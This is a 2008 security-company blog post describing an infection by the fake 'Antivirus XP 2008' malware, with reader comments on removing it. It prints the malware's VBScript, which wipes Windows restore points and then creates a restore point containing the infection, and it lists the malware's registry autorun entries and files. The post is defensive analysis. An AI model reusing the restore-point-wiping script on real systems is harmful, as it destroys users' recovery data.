Antivirus XP 2008 Malware
Click here to read more about SpamStopsHere, the e-mail security company that brings you this blog.
I was on vacation last week and visiting some friends in Maine. Another friend named Jason was also visiting and was trying to fix the screen saver on a Windows XP computer. The screen saver that had been configured no longer worked, and the “Screen Saver” tab and “Desktop” tab were missing from the “Display Properties” control panel. I had never seen that before, and my best friend Don suggested simply rebooting. Jason rebooted the computer, but I didn’t pay attention as to whether this resolved the issue or not, as we were busy talking.
Today, back from vacation, I visited a malicious web site which replaced my desktop image with warnings that read “Warning! Spyware detected on your computer!”, “Warning! Win32/Adware.Virtumonde Detected on your computer”, “Warning! Win32/PrivacyRemover.M64 Detected on your computer”, “Danger!”, and “Please activate your antivirus software to Clean your computer”.
The “Screen Saver” and “Desktop” tabs were missing from the “Display Properties” control panel. Additionally, I was being prompted to click on a license agreement for an application named “Antivirus XP 2008 license agreement”. I noticed that the application was actually already running, even though I hadn’t executed it, downloaded it, or approved the execution of any Active X control.
I ended the task, but of course it was too late. The malware had embedded itself pretty solidly. One of the first things that it had done was run a vbscript to remove all of my previous Windows XP restore points using this visual basic script:
strComputer = “.”
Set objWMIService = GetObject(”winmgmts:\\” & strComputer & “\root\default”)
Set objItem = objWMIService.Get(”SystemRestore”)
errResults = objItem.Disable(”")
strComputer = “.”
Set objWMIService = GetObject(”winmgmts:\\” & strComputer & “\root\default”)
Set objItem = objWMIService.Get(”SystemRestore”)
errResults = objItem.Enable(”")
CONST DEVICE_DRIVER_INSTALL = 10
CONST BEGIN_SYSTEM_CHANGE = 100
strComputer = “.”
Set objWMIService = GetObject(”winmgmts:\\” & strComputer & “\root\default”)
Set objItem = objWMIService.Get(”SystemRestore”)
errResults = objItem.CreateRestorePoint _
(”Last good restore point”, DEVICE_DRIVER_INSTALL, BEGIN_SYSTEM_CHANGE)
If (errResults <> 0) then
WScript.Sleep 10000
End if
Set objWMIService = GetObject(”winmgmts:\\” & strComputer & “\root\default”)
Set objItem = objWMIService.Get(”SystemRestore”)
errResults = objItem.CreateRestorePoint _
(”Last good restore point”, DEVICE_DRIVER_INSTALL, BEGIN_SYSTEM_CHANGE)
This disabled the Windows System Restore service and then enabled it again, clearing out any restore points. It then created a restore point named “Last good restore point”, which included the malware.
To run on reboot, the process created two separate registry entries:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
Value Name: lphcvdej0et2r
Value Data: C:\Windows\system32\lphcvdej0et2r.exe
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Value Name: SVCHOST.EXE
Value Data: C:\Windows\system32\drivers\svchost.exe
The name of the process under HKLM is random, and your infection will have a different name. Besides these files, it also created the following files:
C:\Windows\system32\drivers\tdssserv.sys
C:\Windows\system32\tdssserf.dll
C:\Windows\system32\tdssinit.dll
C:\Windows\system32\tdsslog.dll
C:\Windows\system32\tdssadw.dll
C:\Windows\system32\tdssmain.dll
C:\Windows\system32\tdssservers.dat
C:\Windows\system32\blphcvdej0et2r.scr
The malware apparently also sets your screensaver to use the above .scr file, to help ensure against removal through likely reinfection. To protect against the screen saver being disabled and the desktop image being removed, the malware removed the “Screen Saver” and “Desktop” tabs from the “Display Properties” control panel. Today I realized that my friends in Maine likely were infected with a similar strain of this malware.
The malicious web site that I visited attempted to install through one of the following ways, until it was successful:
Java vulnerabilities - (Not vulnerable, I had just updated)
QuickTime Player vulnerabilities - (Not vulnerable, I had just updated)
Microsoft XML vulnerabilities - (Not vulnerable, old vulnerability)
Adobe Reader vulnerability - (VULNERABLE! I hadn’t updated)
Through my failing to update Adobe Reader regarding the security vulnerability announced June 23,2008, the malware had executed without my even being required to allow it.
It’s very important that one keeps all browser plugins up to date, including the most popular ones above and Adobe Flash and Shockwave.
My Self Removal Procedures
To repair the missing “Screen Saver” and “Desktop” tabs in Display Properties, I deleted the following registry sections:
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system
HKCU\Software\Sysinternals
Once doing that, I ensured that I didn’t have the malicious screensaver selected as my screen saver, fixed my desktop image, and then removed the additional malware files, and rebooted. After reboot, I removed the registry entries that started the processes at runtime, which were now pointing to invalid locations. I also removed the registry entries loading the tdssserv.sys file as a driver. Then I did a thorough anti-virus scan. I recommend using Kaspersky or Avira.
I briefly wrote about this malware in my previous blog article here. Whatever you do, don’t install the Antivirus XP 2008 software by choice, and definitely don’t believe that this software is an anti-virus program that is worthy of being paid for.
This infection was a very recent morph of this malware. Your infection may vary quite a bit. If left infected, this malware has the capability of stealing your account information, inlcuding any typed into an SSL protected web site. Although I performed my own desktop restore after analyzing what changes had been made, you may not want to remove this on your own. Additionally, if you got to the point of actually installing this malware as an anti-virus product, you will have more steps to uninstall it. If you’re running Windows XP, you might consider running an application that will allow you to approve any changes to the registry and other critical system files, similar to Windows Vista’s built-in functionality.
September 13th, 2008 at 2:38 pm
Is there any way to get to a previous restore point after deleting the virus?
September 14th, 2008 at 6:37 am
I think XP antivirus showed how actually vulnerable and imperfect popular antivirus suites are. People bundle their computers with loads of security programs only to find out that XP antivirus feels just great in their protected systems. Self-proclaimed techies recommend to install half a dozen additional applications without giving any reasons except “this might help”. Somehow this makes me think that it’s much better to have protection AGAINST infection, rather than tools to cure XP antivirus. Not specaking about registry changes it can make; sometimes it just doesn’t make sense to remove the trojan because the system is already a mess.
September 15th, 2008 at 4:44 pm
hek,
Unfortunately not, unless you did a backup of your system to an external drive or something. I guess it’s possible that you could recover the restore point files using an “undelete” tool, but I hadn’t tried.
Your restore points are stored under “C:\System Volume Information” if you want to try.
September 22nd, 2008 at 4:50 pm
I too have been infected. My attempts to cure have resulted in my machine refusing to boot up.
I have put my hard drive in an old PC & on bootup it tells me I have a boot sector virus!!
Help!
September 22nd, 2008 at 5:28 pm
Keith,
Since your computer was booting before you attempted to cure it of the virus, I suspect it was your attempts that have caused it to become unbootable. What was the last thing that you did before it becamse unbootable?
October 15th, 2008 at 12:13 am
Hello Keith,
I had a similar experience. after several reboots with the malware starting and the fake BSOD, the PC wouldnt boot anymore. I was able to get around this by booting from a Windows CD and going into recovery mode. Then use the “chkdsk c:” to repair the C drive.
After the boot, I needed to do an F8 and start windows in safe mode. I was able to do a ctl-alt-del and get to task manager. Once there, I was able to kill off the malware process.
I was then able to use AVIRA to scan and isolate the infected files. The bogus screensave is still in place, and I too have the problem where the tab is now missing.
The other item that will help is going into the windows directory and rename the bougus .scr file, so it cant launch.
Hope this helps,
JohnGo